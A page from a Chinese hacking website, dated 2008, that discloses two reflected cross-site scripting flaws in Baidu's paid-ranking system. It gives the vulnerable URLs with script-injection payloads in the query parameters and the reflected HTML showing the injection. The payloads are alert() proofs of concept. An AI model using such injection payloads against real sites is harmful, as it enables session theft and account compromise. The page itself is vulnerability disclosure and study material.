黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[组图]百度竞价排名多处XSS漏洞
        ★★★★★

百度竞价排名多处XSS漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-7-19 10:27:03

今天内容比较平淡,都是普通的XSS。

竞价排名是百度的一个子系统,应该是比较赚钱的一个系统。

访问地址是: http://www2.baidu.com

但是这个系统和其他核心模块比起来,安全性要差上很多。

糟糕的验证码设计暂且不说,XSS方面几乎没有防范。

今天讲这个子系统主要是举例下baidu在非核心系统方面对安全考虑和重视程度的欠缺

类似存在缺陷的系统还非常多。就不一个个去挖了,没有挑战性也没什么意思。

XSS 9: 百度竞价排名管理关键字 XSS 漏洞
漏洞链接如下:

以下是引用片段:
http://www2.baidu.com/query/query_mgr.php?gid=A&tp=A&pe=20&ob=status&sb=keyword&uid=1019083&sw=“><script>alert(/Keyword+XSS/)</script><”&cp=1&submit=1



代码如下:

以下是引用片段:
<form name=choice action=”" method=post><td align=center>
<select name=gid ><option value=”0″>我的关键字</option>
<option value=”A” selected>所有关键字组别</option>
</select>
……
<input name=sw size=10 value=”“><script>alert(/Keyword XSS/)</script><”“>
<input type=hidden name=cp value=”1″>

XSS 10: 百度竞价排名帮助搜索XSS
登录后,如下链接:

以下是引用片段:
http://sf-help.baidu.com/search?word=“><script>alert(/Search+XSS/);</script><”


代码如下:
以下是引用片段:
<form action=’/search’ method=’GET’ style=”margin:0px;padding:0px;”>
<div class=”tit_2″><strong>帮助搜索</strong></div>
<div class=”box_2″>
<input name=”word” type=”text” size=”19″ id=”s” value=”\”><script>alert(/Search XSS/);</script><\”“>
<input type=”submit” name=”Submit” value=”搜索”>
</div>
</form>

 

[1] [2] 下一页

文章录入:cainiaowang    责任编辑:xinlian 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886